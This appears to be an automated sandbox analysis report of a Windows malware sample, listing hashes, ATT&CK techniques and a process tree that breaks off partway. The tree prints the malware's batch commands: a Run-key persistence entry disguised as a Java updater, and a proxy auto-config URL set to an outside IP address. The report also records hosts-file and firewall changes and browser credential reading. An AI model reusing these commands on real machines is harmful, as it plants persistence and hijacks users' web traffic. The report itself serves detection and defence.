9327363fb599980ef259feabaadad4bbb7aa724b2315796df62e1a2f0e9c5a78

Analysis

max time kernel
142s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
22/08/2024, 06:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe
Size

179KB
MD5

b6a780d8d5c7786c5f10cb9f96fddf51
SHA1

3521bfb3f50d4ad831e8f52fda4c5f536a213ae6
SHA256

9327363fb599980ef259feabaadad4bbb7aa724b2315796df62e1a2f0e9c5a78
SHA512

0762471708f0fc8f7461a7760d5b2414a7f94cfa314d959d498559199edc14d602c270963fa351bd7c89de88fdb14fa9f23d08ad6c4b01aac95ee48dde23c459
SSDEEP

3072:oYP2XerzhOUxu/XUtauVL2efff5W9FoP/UT7wrKr0uz:ou2urzh9xu/XkauVLj56FoP7KoO

Score

10^/10

discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	cmd.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4600	netsh.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	arquivo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	ph.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
2952	arquivo.exe
1528	ph.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a00000002362a-6.dat	upx
behavioral2/memory/2952-11-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral2/files/0x0007000000023631-17.dat	upx
behavioral2/memory/1528-18-0x0000000000400000-0x0000000000425000-memory.dmp	upx
behavioral2/memory/2952-59-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral2/memory/1528-68-0x0000000000400000-0x0000000000425000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\JavaUpdateSched = "C:\\Users\\Admin\\AppData\\Local\\Temp\\jusched.exe"	reg.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3208	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	arquivo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Kills process with taskkill 20 IoCs

evasion

pid	Process
3060	taskkill.exe
4632	taskkill.exe
4544	taskkill.exe
4264	taskkill.exe
1780	taskkill.exe
1644	taskkill.exe
3284	taskkill.exe
948	taskkill.exe
4580	taskkill.exe
632	taskkill.exe
404	taskkill.exe
4064	taskkill.exe
1376	taskkill.exe
2784	taskkill.exe
5028	taskkill.exe
3044	taskkill.exe
2252	taskkill.exe
2184	taskkill.exe
4968	taskkill.exe
4484	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "895872313"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "898841117"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{60B2779F-604F-11EF-A2A4-CA89CBF88D4A} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31126620"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009a7bf3bae5f3a549b81f23758225dc5c0000000002000000000010660000000100002000000023804b175a979a5974798ea5dc51eb816efd985f811101afa2bd851e2ae7ec5f000000000e800000000200002000000031a18fa9a74f711efc899287d4a43e20b1151d314818e909e321c0a87cc127f320000000fd43b8b14e0fa6ee1bad3764f2058bf2733cc8d4ef76bed2f17df78843fcfebd400000008456c4d75ec18a398ed8e649eedf76c73d5b4cec5d79dea326632d3132d75d28b85a2596af73525b3508295c212d651cd60e8acdd0874ac2db9556de01583136	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20ce2b365cf4da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009a7bf3bae5f3a549b81f23758225dc5c000000000200000000001066000000010000200000005f3946bbe4504f9100d3f6d1833df2adde237db970fd2e4f4bd7d541c26a2884000000000e80000000020000200000001e915fb7a3f26f2a45a08377a1160f76f9cc40b6e8ffb86e6d6838015790eb152000000088dec9dc785aa5feea253c83ae34b3fc36e6f4c36d396f382f7345a36b3a582440000000a8ba7f16589488ff81c6ff4fe7ca896e15b3ac8236920f782bbbe0f95ce12d613e48be5a26f16b9167ceae301c0142723fdc86abedba75f5d3abbd4a2392c3ca	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "431072926"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 108930365cf4da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "895872313"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31126620"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31126620"	iexplore.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	404	taskkill.exe
Token: SeDebugPrivilege	4484	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	4064	taskkill.exe
Token: SeDebugPrivilege	4968	taskkill.exe
Token: SeDebugPrivilege	1376	taskkill.exe
Token: SeDebugPrivilege	3284	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	3060	taskkill.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	4632	taskkill.exe
Token: SeDebugPrivilege	4580	taskkill.exe
Token: SeDebugPrivilege	4544	taskkill.exe
Token: SeDebugPrivilege	4264	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3816	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3816	iexplore.exe
3816	iexplore.exe
832	IEXPLORE.EXE
832	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4984 wrote to memory of 2952	4984	b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe	93
PID 4984 wrote to memory of 2952	4984	b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe	93
PID 4984 wrote to memory of 2952	4984	b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe	93
PID 2952 wrote to memory of 2540	2952	arquivo.exe	94
PID 2952 wrote to memory of 2540	2952	arquivo.exe	94
PID 2952 wrote to memory of 2540	2952	arquivo.exe	94
PID 2540 wrote to memory of 1528	2540	cmd.exe	98
PID 2540 wrote to memory of 1528	2540	cmd.exe	98
PID 2540 wrote to memory of 1528	2540	cmd.exe	98
PID 2540 wrote to memory of 2612	2540	cmd.exe	99
PID 2540 wrote to memory of 2612	2540	cmd.exe	99
PID 2540 wrote to memory of 2612	2540	cmd.exe	99
PID 2612 wrote to memory of 4464	2612	net.exe	100
PID 2612 wrote to memory of 4464	2612	net.exe	100
PID 2612 wrote to memory of 4464	2612	net.exe	100
PID 2540 wrote to memory of 3208	2540	cmd.exe	101
PID 2540 wrote to memory of 3208	2540	cmd.exe	101
PID 2540 wrote to memory of 3208	2540	cmd.exe	101
PID 2540 wrote to memory of 4600	2540	cmd.exe	102
PID 2540 wrote to memory of 4600	2540	cmd.exe	102
PID 2540 wrote to memory of 4600	2540	cmd.exe	102
PID 1528 wrote to memory of 4704	1528	ph.exe	103
PID 1528 wrote to memory of 4704	1528	ph.exe	103
PID 1528 wrote to memory of 4704	1528	ph.exe	103
PID 4704 wrote to memory of 3380	4704	cmd.exe	105
PID 4704 wrote to memory of 3380	4704	cmd.exe	105
PID 4704 wrote to memory of 3380	4704	cmd.exe	105
PID 4704 wrote to memory of 1424	4704	cmd.exe	106
PID 4704 wrote to memory of 1424	4704	cmd.exe	106
PID 4704 wrote to memory of 1424	4704	cmd.exe	106
PID 4704 wrote to memory of 3160	4704	cmd.exe	107
PID 4704 wrote to memory of 3160	4704	cmd.exe	107
PID 4704 wrote to memory of 3160	4704	cmd.exe	107
PID 4704 wrote to memory of 3284	4704	cmd.exe	149
PID 4704 wrote to memory of 3284	4704	cmd.exe	149
PID 4704 wrote to memory of 3284	4704	cmd.exe	149
PID 4704 wrote to memory of 4132	4704	cmd.exe	109
PID 4704 wrote to memory of 4132	4704	cmd.exe	109
PID 4704 wrote to memory of 4132	4704	cmd.exe	109
PID 4704 wrote to memory of 2464	4704	cmd.exe	150
PID 4704 wrote to memory of 2464	4704	cmd.exe	150
PID 4704 wrote to memory of 2464	4704	cmd.exe	150
PID 4704 wrote to memory of 2292	4704	cmd.exe	111
PID 4704 wrote to memory of 2292	4704	cmd.exe	111
PID 4704 wrote to memory of 2292	4704	cmd.exe	111
PID 4704 wrote to memory of 4796	4704	cmd.exe	112
PID 4704 wrote to memory of 4796	4704	cmd.exe	112
PID 4704 wrote to memory of 4796	4704	cmd.exe	112
PID 4704 wrote to memory of 4780	4704	cmd.exe	113
PID 4704 wrote to memory of 4780	4704	cmd.exe	113
PID 4704 wrote to memory of 4780	4704	cmd.exe	113
PID 4704 wrote to memory of 5008	4704	cmd.exe	114
PID 4704 wrote to memory of 5008	4704	cmd.exe	114
PID 4704 wrote to memory of 5008	4704	cmd.exe	114
PID 4704 wrote to memory of 2004	4704	cmd.exe	115
PID 4704 wrote to memory of 2004	4704	cmd.exe	115
PID 4704 wrote to memory of 2004	4704	cmd.exe	115
PID 4704 wrote to memory of 2772	4704	cmd.exe	116
PID 4704 wrote to memory of 2772	4704	cmd.exe	116
PID 4704 wrote to memory of 2772	4704	cmd.exe	116
PID 4704 wrote to memory of 4400	4704	cmd.exe	117
PID 4704 wrote to memory of 4400	4704	cmd.exe	117
PID 4704 wrote to memory of 4400	4704	cmd.exe	117
PID 4704 wrote to memory of 876	4704	cmd.exe	155

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
396	attrib.exe
4664	attrib.exe
2464	attrib.exe
1596	attrib.exe
3304	attrib.exe
1516	attrib.exe

C:\Users\Admin\AppData\Local\Temp\b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\b6a780d8d5c7786c5f10cb9f96fddf51_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4984
- C:\Users\Admin\AppData\Local\Temp\arquivo.exe
  "C:\Users\Admin\AppData\Local\Temp\arquivo.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\605B.tmp\arquivo.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2540
  - - C:\Users\Admin\AppData\Local\Temp\ph.exe
      ph.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1528
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6193.tmp\video.bat" "
        5⤵
        Drops file in Drivers directory
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4704
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3380
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "JavaUpdateSched" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\jusched.exe"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1424
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3160
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "198.173.127.140pt-BR.js" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3284
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        
        PID:4132
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2464
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2292
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
        6⤵
        
        PID:4796
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        
        PID:4780
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
        6⤵
        
        PID:5008
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2004
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2772
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4400
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
        6⤵
        
        PID:876
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        6⤵
        
        PID:3456
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3060
      - C:\Windows\SysWOW64\cmd.exe
        
